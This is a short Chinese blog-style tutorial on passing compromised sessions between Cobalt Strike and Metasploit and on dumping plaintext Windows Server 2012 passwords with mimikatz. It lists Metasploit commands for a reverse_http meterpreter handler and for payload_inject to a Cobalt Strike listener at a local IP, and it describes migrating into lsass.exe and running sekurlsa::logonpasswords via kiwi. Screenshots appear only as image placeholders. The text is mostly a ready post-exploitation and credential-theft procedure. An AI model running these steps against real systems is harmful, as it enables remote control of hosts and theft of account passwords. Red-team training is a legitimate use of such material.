cs与msf权限传递&mimikatz抓取win2012明文密码

209 阅读1分钟

cs会话传递到msf

条件:已上线cs,获得控制权

image.png

在msf上启用reverse_http模块监听本地端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http 
set lhost 192.168.88.128
set lport 4444

image.png

在cs上创建一个foreign http监听,ip和端口设置为msf监听的ip和端口:

image.png

凭证提权 -> 新建会话 —> 选择创建的foreign http监听:

image.png

msf成功拿到会话:

image.png

msf会话传递到cs

条件:msf已获取meterpreter shell

image.png

在cs上创建一个http beacon的监听器:

image.png

msf启用payload_inject模块,ip和端口设置为cs监听的ip和端口:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4567
set session 1
set DisablePayloadHandler true

image.png

cs成功拿到会话:

image.png

mimikatz抓取win2012明文密码

cs利用mimikatz抓取明文密码

cs必须获取一个管理员权限的会话:

image.png

会话交互执行命令logonpasswords,然后beacon执行mimikatz模块:

image.png

msf利用mimikatz抓取明文密码

同样的msf必须先获取一个管理员权限的shell:

image.png

查看当前系统信息,可以看出目标系统是64位的:

image.png

查看当前进程列表lsass.exe进程PID为484:

image.png

把当前meterpreter shell进程迁移到PID为484的lsass.exe进程里,加载kiwi模块,使用kiwi_cmd执行mimikatz命令sekurlsa::logonpasswords:

image.png